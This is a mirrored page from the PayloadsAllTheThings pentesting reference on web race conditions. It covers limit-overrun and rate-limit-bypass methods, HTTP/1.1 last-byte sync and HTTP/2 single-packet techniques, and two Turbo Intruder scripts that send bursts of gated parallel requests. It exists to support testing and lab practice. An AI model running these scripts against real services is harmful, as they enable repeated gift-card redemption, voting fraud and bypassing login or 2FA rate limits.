index.md (8665B)
1 --- 2 title: "Race Condition" 3 topic: "Race Condition" 4 topicSlug: "race-condition" 5 sourcePath: "Race Condition/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Race%20Condition/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Race Condition 12 13 > Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language. 14 15 ## Summary 16 17 - [Tools](#tools) 18 - [Methodology](#methodology) 19 - [Limit-overrun](#limit-overrun) 20 - [Rate-limit Bypass](#rate-limit-bypass) 21 - [Techniques](#techniques) 22 - [HTTP/1.1 Last-byte Synchronization](#http11-last-byte-synchronization) 23 - [HTTP/2 Single-packet Attack](#http2-single-packet-attack) 24 - [Turbo Intruder](#turbo-intruder) 25 - [Example 1](#example-1) 26 - [Example 2](#example-2) 27 - [Labs](#labs) 28 - [References](#references) 29 30 ## Tools 31 32 - [PortSwigger/turbo-intruder](https://github.com/PortSwigger/turbo-intruder) - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. 33 - [JavanXD/Raceocat](https://github.com/JavanXD/Raceocat) - Make exploiting race conditions in web applications highly efficient and ease-of-use. 34 - [nxenon/h2spacex](https://github.com/nxenon/h2spacex) - HTTP/2 Single Packet Attack low Level Library / Tool based on Scapy + Exploit Timing Attacks 35 36 ## Methodology 37 38 ### Limit-overrun 39 40 Limit-overrun refers to a scenario where multiple threads or processes compete to update or access a shared resource, resulting in the resource exceeding its intended limits. 41 42 **Examples**: Overdrawing limit, multiple voting, multiple spending of a giftcard. 43 44 - [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247) 45 - [Race conditions can be used to bypass invitation limit - @franjkovic](https://hackerone.com/reports/115007) 46 - [Register multiple users using one invitation - @franjkovic](https://hackerone.com/reports/148609) 47 48 ### Rate-limit Bypass 49 50 Rate-limit bypass occurs when an attacker exploits the lack of proper synchronization in rate-limiting mechanisms to exceed intended request limits. Rate-limiting is designed to control the frequency of actions (e.g., API requests, login attempts), but race conditions can allow attackers to bypass these restrictions. 51 52 **Examples**: Bypassing anti-bruteforce mechanism and 2FA. 53 54 - [Instagram Password Reset Mechanism Race Condition - Laxman Muthiyah](https://youtu.be/4O9FjTMlHUM) 55 56 ## Techniques 57 58 ### HTTP/1.1 Last-byte Synchronization 59 60 Send every requests except the last byte, then "release" each request by sending the last byte. 61 62 Execute a last-byte synchronization using Turbo Intruder 63 64 ```py 65 engine.queue(request, gate='race1') 66 engine.queue(request, gate='race1') 67 engine.openGate('race1') 68 ``` 69 70 **Examples**: 71 72 - [Cracking reCAPTCHA, Turbo Intruder style - James Kettle](https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style) 73 74 ### HTTP/2 Single-packet Attack 75 76 In HTTP/2 you can send multiple HTTP requests concurrently over a single connection. In the single-packet attack around ~20/30 requests will be sent and they will arrive at the same time on the server. Using a single request remove the network jitter. 77 78 - [PortSwigger/turbo-intruder/race-single-packet-attack.py](https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py) 79 - Burp Suite 80 - Send a request to Repeater 81 - Duplicate the request 20 times (CTRL+R) 82 - Create a new group and add all the requests 83 - Send group in parallel (single-packet attack) 84 85 **Examples**: 86 87 - [CVE-2022-4037 - Discovering a race condition vulnerability in Gitlab with the single-packet attack - James Kettle](https://youtu.be/Y0NVIVucQNE) 88 89 ## Turbo Intruder 90 91 ### Example 1 92 93 1. Send request to turbo intruder 94 2. Use this python code as a payload of the turbo intruder 95 96 ```python 97 def queueRequests(target, wordlists): 98 engine = RequestEngine(endpoint=target.endpoint, 99 concurrentConnections=30, 100 requestsPerConnection=30, 101 pipeline=False 102 ) 103 104 for i in range(30): 105 engine.queue(target.req, i) 106 engine.queue(target.req, target.baseInput, gate='race1') 107 108 109 engine.start(timeout=5) 110 engine.openGate('race1') 111 112 engine.complete(timeout=60) 113 114 115 def handleResponse(req, interesting): 116 table.add(req) 117 ``` 118 119 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 120 4. Click "Attack" 121 122 ### Example 2 123 124 This following template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds. 125 126 ```python 127 def queueRequests(target, wordlists): 128 engine = RequestEngine(endpoint=target.endpoint, 129 concurrentConnections=30, 130 requestsPerConnection=100, 131 pipeline=False 132 ) 133 request1 = ''' 134 POST /target-URI-1 HTTP/1.1 135 Host: <REDACTED> 136 Cookie: session=<REDACTED> 137 138 parameterName=parameterValue 139 ''' 140 141 request2 = ''' 142 GET /target-URI-2 HTTP/1.1 143 Host: <REDACTED> 144 Cookie: session=<REDACTED> 145 ''' 146 147 engine.queue(request1, gate='race1') 148 for i in range(30): 149 engine.queue(request2, gate='race1') 150 engine.openGate('race1') 151 engine.complete(timeout=60) 152 def handleResponse(req, interesting): 153 table.add(req) 154 ``` 155 156 ## Labs 157 158 - [PortSwigger - Limit overrun race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun) 159 - [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint) 160 - [PortSwigger - Bypassing rate limits via race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-bypassing-rate-limits) 161 - [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint) 162 - [PortSwigger - Single-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) 163 - [PortSwigger - Exploiting time-sensitive vulnerabilities](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) 164 - [PortSwigger - Partial construction race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) 165 166 ## References 167 168 - [Beyond the Limit: Expanding single-packet race condition with a first sequence sync for breaking the 65,535 byte limit - @ryotkak - August 2, 2024](https://web.archive.org/web/20251116040307/https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/) 169 - [DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle (@albinowax) - September 15, 2023](https://web.archive.org/web/20231018114533/https://youtu.be/tKJzsaB1ZvI) 170 - [Exploiting Race Condition Vulnerabilities in Web Applications - Javan Rasokat - October 6, 2022](https://web.archive.org/web/20221006190254/http://conference.hitb.org/hitbsecconf2022sin/materials/D2%20COMMSEC%20-%20Exploiting%20Race%20Condition%20Vulnerabilities%20in%20Web%20Applications%20-%20Javan%20Rasokat.pdf) 171 - [New techniques and tools for web race conditions - Emma Stocks - August 10, 2023](https://web.archive.org/web/20230810160828/https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions) 172 - [Race Condition Bug In Web App: A Use Case - Mandeep Jadon - April 24, 2018](https://web.archive.org/web/20260302041740/https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) 173 - [Race conditions on the web - Josip Franjkovic - July 12, 2016](https://web.archive.org/web/20160712132451/https://www.josipfranjkovic.com/blog/race-conditions-on-web) 174 - [Smashing the state machine: the true potential of web race conditions - James Kettle (@albinowax) - August 9, 2023](https://web.archive.org/web/20230809185504/https://portswigger.net/research/smashing-the-state-machine) 175 - [Turbo Intruder: Embracing the billion-request attack - James Kettle (@albinowax) - January 25, 2019](https://web.archive.org/web/20190929052757/https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)